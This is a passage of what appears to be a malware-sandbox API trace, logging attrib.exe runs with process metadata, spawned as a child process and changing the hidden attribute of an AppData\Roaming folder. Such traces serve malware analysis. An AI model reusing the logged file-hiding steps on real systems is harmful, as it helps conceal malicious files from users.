??0DSTRING@@QAE@XZ () returned 0x35f09c [0266.079] Get_Standard_Output_Stream () returned 0x670568 [0266.079] Get_Standard_Input_Stream () returned 0x670518 [0266.079] ?Initialize@STREAM_MESSAGE@@QAEEPAVSTREAM@@00@Z () returned 0x1 [0266.516] ?Initialize@WSTRING@@QAEEPBGK@Z () returned 0x677b01 [0266.516] ?Initialize@ARRAY@@QAEEKK@Z () returned 0x1 [0266.516] ?Initialize@ARGUMENT_LEXEMIZER@@QAEEPAVARRAY@@@Z () returned 0x677b01 [0266.516] ?PutSwitches@ARGUMENT_LEXEMIZER@@QAEXPBD@Z () returned 0x677b01 [0266.516] ?SetCaseSensitive@ARGUMENT_LEXEMIZER@@QAEXE@Z () returned 0x677b00 [0266.516] ?Initialize@WSTRING@@QAEEPBDK@Z () returned 0x677c01 [0266.516] ?Initialize@WSTRING@@QAEEPBDK@Z () returned 0x677c01 [0266.516] ?PutSeparators@ARGUMENT_LEXEMIZER@@QAEXPBD@Z () returned 0x677b01 [0266.516] ?PrepareToParse@ARGUMENT_LEXEMIZER@@QAEEPAVWSTRING@@@Z () returned 0xffffff01 [0266.516] ?Initialize@ARRAY@@QAEEKK@Z () returned 0x1 [0266.516] ?Initialize@LONG_ARGUMENT@@QAEEPAD@Z () returned 0x677c01 [0266.516] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x677c01 [0266.516] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x677c01 [0266.517] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x677c01 [0266.517] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x677b01 [0266.517] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x677b01 [0266.517] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x677b01 [0266.517] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x677b01 [0266.517] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x677b01 [0266.517] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x677d01 [0266.517] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x677d01 [0266.517] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x677d01 [0266.517] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x677d01 [0266.517] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x677e01 [0266.517] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x677e01 [0266.517] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x677e01 [0266.517] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x677e01 [0266.517] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x677d01 [0266.517] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x677e01 [0266.517] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x677d01 [0266.517] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x677e01 [0266.517] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x677e01 [0266.517] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x677d01 [0266.517] ?Initialize@LONG_ARGUMENT@@QAEEPAD@Z () returned 0x677e01 [0266.517] ?Initialize@LONG_ARGUMENT@@QAEEPAD@Z () returned 0x677d01 [0266.517] ?Initialize@LONG_ARGUMENT@@QAEEPAD@Z () returned 0x677d01 [0266.517] ?Initialize@PATH_ARGUMENT@@QAEEPADE@Z () returned 0x677d01 [0266.517] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x35ef01 [0266.517] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x35f601 [0266.517] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x35f601 [0266.517] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x35f601 [0266.517] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x35f601 [0266.517] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x35f701 [0266.517] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x35f601 [0266.517] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x35f701 [0266.517] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x35f701 [0266.517] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x35f701 [0266.517] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x35f701 [0266.518] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x35f801 [0266.518] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x35f701 [0266.518] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x35f801 [0266.518] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x35f801 [0266.518] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x35f801 [0266.518] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x35f801 [0266.518] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x35f901 [0266.518] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x35f901 [0266.518] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x35f901 [0266.518] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x35f901 [0266.518] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x35fa01 [0266.518] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x35f901 [0266.518] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x35ef01 [0266.518] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x35f001 [0266.518] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x35ef01 [0266.518] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x35fa01 [0266.518] ?DoParsing@ARGUMENT_LEXEMIZER@@QAEEPAVARRAY@@@Z () returned 0x1 [0266.518] ?IsValueSet@ARGUMENT@@QAEEXZ () returned 0x0 [0266.518] ?IsValueSet@ARGUMENT@@QAEEXZ () returned 0x0 [0266.518] ?IsValueSet@ARGUMENT@@QAEEXZ () returned 0x0 [0266.518] ?IsValueSet@ARGUMENT@@QAEEXZ () returned 0xffefff01 [0266.518] ?Initialize@PATH@@QAEEPBVWSTRING@@E@Z () returned 0x35fc01 [0266.518] ?QueryString@WSTRING@@QBEPAV1@KK@Z () returned 0x67adb0 [0266.518] ?Initialize@PATH@@QAEEPBVWSTRING@@E@Z () returned 0x35f301 [0266.518] ?IsDrive@PATH@@QBEEXZ () returned 0x0 [0266.518] ?QueryDirectory@SYSTEM@@SGPAVFSN_DIRECTORY@@PBVPATH@@E@Z () returned 0x67b858 [0266.519] ?Initialize@FSN_FILTER@@QAEEXZ () returned 0x1 [0266.519] ?SetFileName@FSN_FILTER@@QAEEPBD@Z () returned 0x677c01 [0266.519] ?SetAttributes@FSN_FILTER@@QAEEKKK@Z () returned 0x1 [0266.519] ?QueryString@WSTRING@@QBEPAV1@KK@Z () returned 0x67af70 [0266.519] ?Strchr@WSTRING@@QBEKGK@Z () returned 0xffffffff [0266.519] ?Strchr@WSTRING@@QBEKGK@Z () returned 0xffffffff [0266.519] ?Initialize@FSN_FILTER@@QAEEXZ () returned 0x1 [0266.519] ?SetFileName@FSN_FILTER@@QAEEPBVWSTRING@@@Z () returned 0x67ad01 [0266.519] ?SetAttributes@FSN_FILTER@@QAEEKKK@Z () returned 0x1 [0266.519] ?DeleteAllMembers@ARRAY@@UAEEXZ () returned 0x67b001 [0266.519] ??1DSTRING@@UAE@XZ () returned 0x67b001 [0266.519] ??1STRING_ARGUMENT@@UAE@XZ () returned 0x1 [0266.519] ??1STRING_ARGUMENT@@UAE@XZ () returned 0x1 [0266.519] ??1STRING_ARGUMENT@@UAE@XZ () returned 0x1 [0266.519] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.519] ??1PATH@@UAE@XZ () returned 0x1 [0266.519] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.519] ??1PATH@@UAE@XZ () returned 0x1 [0266.519] ??1STRING_ARGUMENT@@UAE@XZ () returned 0x1 [0266.519] ??1ARRAY@@UAE@XZ () returned 0x1 [0266.519] ??1ARRAY@@UAE@XZ () returned 0x1 [0266.519] ??1ARGUMENT_LEXEMIZER@@UAE@XZ () returned 0x1 [0266.519] ?QueryFsnodeArray@FSN_DIRECTORY@@QBEPAVARRAY@@PAVFSN_FILTER@@@Z () returned 0x67b010 [0266.520] ?QueryIterator@ARRAY@@UBEPAVITERATOR@@XZ () returned 0x67a760 [0266.521] ?SetAttributes@FSNODE@@QAEEKPAK@Z () returned 0x1 [0266.521] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.521] ??1PATH@@UAE@XZ () returned 0x1 [0266.521] ??1STREAM_MESSAGE@@UAE@XZ () returned 0x73f61248 [0266.521] ??1FSN_FILTER@@UAE@XZ () returned 0x1 [0266.521] ??1FSN_FILTER@@UAE@XZ () returned 0x1 [0266.521] ??1PATH_ARGUMENT@@UAE@XZ () returned 0x1 [0266.521] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.521] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.521] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.521] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.521] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.521] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.521] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.521] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.521] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.521] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.521] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.522] ??1PROGRAM@@UAE@XZ () returned 0x73f61248 [0266.522] exit (_Code=0) Thread: id = 589 os_tid = 0xdd8 Process: id = "49" image_name = "attrib.exe" filename = "c:\\windows\\syswow64\\attrib.exe" page_root = "0x5b6a2000" os_pid = "0x85c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "40" os_parent_pid = "0x13d8" cmd_line = "attrib -h \"C:\\Users\\FD1HVy\\AppData\\Roaming\\Still\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 590 os_tid = 0x56c [0266.915] GetModuleHandleA (lpModuleName=0x0) returned 0x12a0000 [0266.915] __set_app_type (_Type=0x1) [0266.915] __p__fmode () returned 0x776f3c14 [0266.915] __p__commode () returned 0x776f49ec [0266.915] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a3210) returned 0x0 [0266.915] __getmainargs (in: _Argc=0x12a4018, _Argv=0x12a401c, _Env=0x12a4020, _DoWildCard=0, _StartInfo=0x12a402c | out: _Argc=0x12a4018, _Argv=0x12a401c, _Env=0x12a4020) returned 0 [0266.915] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0266.915] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x4) returned 0x9aaef0 [0266.915] ??0CLASS_DESCRIPTOR@@QAE@XZ () returned 0x9aaef0 [0266.915] ?Initialize@CLASS_DESCRIPTOR@@QAEEPBD@Z () returned 0x9aae01 [0266.916] ??0PROGRAM@@IAE@XZ () returned 0x6af030 [0266.916] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af0b8 [0266.916] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af0e8 [0266.916] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af118 [0266.916] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af148 [0266.916] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af178 [0266.916] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af1a8 [0266.916] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af1d8 [0266.916] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af208 [0266.916] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af238 [0266.916] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af268 [0266.916] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af298 [0266.916] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af2c8 [0266.916] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af2f8 [0266.916] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af328 [0266.916] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af358 [0266.916] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af388 [0266.916] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af3b8 [0266.916] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af3e8 [0266.916] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af418 [0266.916] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af448 [0266.916] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af478 [0266.916] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x6af4a8 [0266.916] ??0PATH_ARGUMENT@@QAE@XZ () returned 0x6af4d8 [0266.916] ??0FSN_FILTER@@QAE@XZ () returned 0x6af50c [0266.916] ??0FSN_FILTER@@QAE@XZ () returned 0x6af5ac [0266.916] ??0STREAM_MESSAGE@@QAE@XZ () returned 0x6af650 [0266.916] ??0PATH@@QAE@XZ () returned 0x6af6b8 [0266.916] ??0DSTRING@@QAE@XZ () returned 0x6af908 [0266.916] ??0ARGUMENT_LEXEMIZER@@QAE@XZ () returned 0x6ae940 [0266.916] ??0ARRAY@@QAE@XZ () returned 0x6aeb0c [0266.916] ??0ARRAY@@QAE@XZ () returned 0x6aeb54 [0266.917] ??0STRING_ARGUMENT@@QAE@XZ () returned 0x6aea44 [0266.917] ??0PATH@@QAE@XZ () returned 0x6aedc8 [0266.917] ??0DSTRING@@QAE@XZ () returned 0x6aeb24 [0266.917] ??0PATH@@QAE@XZ () returned 0x6aeb80 [0266.917] ??0DSTRING@@QAE@XZ () returned 0x6aeaf4 [0266.917] ??0STRING_ARGUMENT@@QAE@XZ () returned 0x6aea9c [0266.917] ??0STRING_ARGUMENT@@QAE@XZ () returned 0x6aeac8 [0266.917] ??0STRING_ARGUMENT@@QAE@XZ () returned 0x6aea70 [0266.917] ??0DSTRING@@QAE@XZ () returned 0x6aeb3c [0266.917] Get_Standard_Output_Stream () returned 0x9a0568 [0266.917] Get_Standard_Input_Stream () returned 0x9a0518 [0266.917] ?Initialize@STREAM_MESSAGE@@QAEEPAVSTREAM@@00@Z () returned 0x1 [0266.944] ?Initialize@WSTRING@@QAEEPBGK@Z () returned 0x9aaf01 [0266.944] ?Initialize@ARRAY@@QAEEKK@Z () returned 0x1 [0266.944] ?Initialize@ARGUMENT_LEXEMIZER@@QAEEPAVARRAY@@@Z () returned 0x9aae01 [0266.944] ?PutSwitches@ARGUMENT_LEXEMIZER@@QAEXPBD@Z () returned 0x9aae01 [0266.944] ?SetCaseSensitive@ARGUMENT_LEXEMIZER@@QAEXE@Z () returned 0x9aae00 [0266.944] ?Initialize@WSTRING@@QAEEPBDK@Z () returned 0x9aaf01 [0266.944] ?Initialize@WSTRING@@QAEEPBDK@Z () returned 0x9aaf01 [0266.944] ?PutSeparators@ARGUMENT_LEXEMIZER@@QAEXPBD@Z () returned 0x9aae01 [0266.944] ?PrepareToParse@ARGUMENT_LEXEMIZER@@QAEEPAVWSTRING@@@Z () returned 0xffffff01 [0266.944] ?Initialize@ARRAY@@QAEEKK@Z () returned 0x1 [0266.944] ?Initialize@LONG_ARGUMENT@@QAEEPAD@Z () returned 0x9aae01 [0266.944] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x9aaf01 [0266.944] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x9aaf01 [0266.944] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x9aaf01 [0266.944] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x9aaf01 [0266.944] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x9ab001 [0266.944] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x9aaf01 [0266.944] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x9ab001 [0266.945] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x9ab001 [0266.945] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x9ab101 [0266.945] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x9ab101 [0266.945] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x9ab101 [0266.945] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x9ab101 [0266.945] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x9ab201 [0266.945] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x9ab101 [0266.945] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x9ab101 [0266.945] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x9ab201 [0266.945] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x9ab001 [0266.945] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x9ab001 [0266.945] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x9ab201 [0266.945] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x9ab001 [0266.945] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x9ab101 [0266.945] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x9ab001 [0266.945] ?Initialize@LONG_ARGUMENT@@QAEEPAD@Z () returned 0x9ab101 [0266.945] ?Initialize@LONG_ARGUMENT@@QAEEPAD@Z () returned 0x9ab101 [0266.945] ?Initialize@LONG_ARGUMENT@@QAEEPAD@Z () returned 0x9ab101 [0266.945] ?Initialize@PATH_ARGUMENT@@QAEEPADE@Z () returned 0x9ab001 [0266.945] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6aea01 [0266.945] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af001 [0266.945] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af001 [0266.945] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af101 [0266.945] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af101 [0266.945] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af101 [0266.945] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af101 [0266.945] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af201 [0266.945] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af101 [0266.945] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af201 [0266.945] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af201 [0266.945] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af201 [0266.945] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af201 [0266.945] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af301 [0266.945] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af201 [0266.946] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af301 [0266.946] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af301 [0266.946] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af301 [0266.946] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af301 [0266.946] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af401 [0266.946] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af401 [0266.946] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af401 [0266.946] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af401 [0266.946] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6aea01 [0266.946] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6aea01 [0266.946] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6aea01 [0266.946] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x6af401 [0266.946] ?DoParsing@ARGUMENT_LEXEMIZER@@QAEEPAVARRAY@@@Z () returned 0x1 [0266.946] ?IsValueSet@ARGUMENT@@QAEEXZ () returned 0x0 [0266.946] ?IsValueSet@ARGUMENT@@QAEEXZ () returned 0x0 [0266.946] ?IsValueSet@ARGUMENT@@QAEEXZ () returned 0x0 [0266.946] ?IsValueSet@ARGUMENT@@QAEEXZ () returned 0xffefff01 [0266.946] ?Initialize@PATH@@QAEEPBVWSTRING@@E@Z () returned 0x6af601 [0266.946] ?QueryString@WSTRING@@QBEPAV1@KK@Z () returned 0x9ae390 [0266.946] ?Initialize@PATH@@QAEEPBVWSTRING@@E@Z () returned 0x6aed01 [0266.946] ?IsDrive@PATH@@QBEEXZ () returned 0x0 [0266.946] ?QueryDirectory@SYSTEM@@SGPAVFSN_DIRECTORY@@PBVPATH@@E@Z () returned 0x9ae968 [0266.947] ?Initialize@FSN_FILTER@@QAEEXZ () returned 0x1 [0266.947] ?SetFileName@FSN_FILTER@@QAEEPBD@Z () returned 0x9aae01 [0266.947] ?SetAttributes@FSN_FILTER@@QAEEKKK@Z () returned 0x1 [0266.947] ?QueryString@WSTRING@@QBEPAV1@KK@Z () returned 0x9ae390 [0266.947] ?Strchr@WSTRING@@QBEKGK@Z () returned 0xffffffff [0266.947] ?Strchr@WSTRING@@QBEKGK@Z () returned 0xffffffff [0266.947] ?Initialize@FSN_FILTER@@QAEEXZ () returned 0x1 [0266.947] ?SetFileName@FSN_FILTER@@QAEEPBVWSTRING@@@Z () returned 0x9ae301 [0266.947] ?SetAttributes@FSN_FILTER@@QAEEKKK@Z () returned 0x1 [0266.947] ?DeleteAllMembers@ARRAY@@UAEEXZ () returned 0x9adc01 [0266.947] ??1DSTRING@@UAE@XZ () returned 0x9adc01 [0266.947] ??1STRING_ARGUMENT@@UAE@XZ () returned 0x1 [0266.947] ??1STRING_ARGUMENT@@UAE@XZ () returned 0x1 [0266.947] ??1STRING_ARGUMENT@@UAE@XZ () returned 0x1 [0266.947] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.947] ??1PATH@@UAE@XZ () returned 0x1 [0266.947] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.947] ??1PATH@@UAE@XZ () returned 0x1 [0266.947] ??1STRING_ARGUMENT@@UAE@XZ () returned 0x1 [0266.947] ??1ARRAY@@UAE@XZ () returned 0x1 [0266.947] ??1ARRAY@@UAE@XZ () returned 0x1 [0266.948] ??1ARGUMENT_LEXEMIZER@@UAE@XZ () returned 0x1 [0266.948] ?QueryFsnodeArray@FSN_DIRECTORY@@QBEPAVARRAY@@PAVFSN_FILTER@@@Z () returned 0x9adca0 [0266.948] ?QueryIterator@ARRAY@@UBEPAVITERATOR@@XZ () returned 0x9adcc0 [0266.949] ?SetAttributes@FSNODE@@QAEEKPAK@Z () returned 0x1 [0266.950] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.950] ??1PATH@@UAE@XZ () returned 0x1 [0266.950] ??1STREAM_MESSAGE@@UAE@XZ () returned 0x73f61248 [0266.950] ??1FSN_FILTER@@UAE@XZ () returned 0x1 [0266.950] ??1FSN_FILTER@@UAE@XZ () returned 0x1 [0266.950] ??1PATH_ARGUMENT@@UAE@XZ () returned 0x1 [0266.950] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.950] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.950] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.950] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.950] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.950] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.950] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.950] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.950] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.950] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.950] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.951] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.951] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.951] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.951] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.951] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.951] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.951] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.951] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.951] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.951] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.951] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.951] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.951] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.951] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.951] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.951] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.951] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.951] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.951] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.951] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.951] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.951] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.951] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.951] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.951] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.951] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.952] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.952] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.952] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.952] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.952] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.952] ??1DSTRING@@UAE@XZ () returned 0x1 [0266.952] ??1BSTRING@@UAE@XZ () returned 0x1 [0266.952] ??1PROGRAM@@UAE@XZ () returned 0x73f61248 [0266.952] exit (_Code=0) Thread: id = 592 os_tid = 0x440 Process: id = "50" 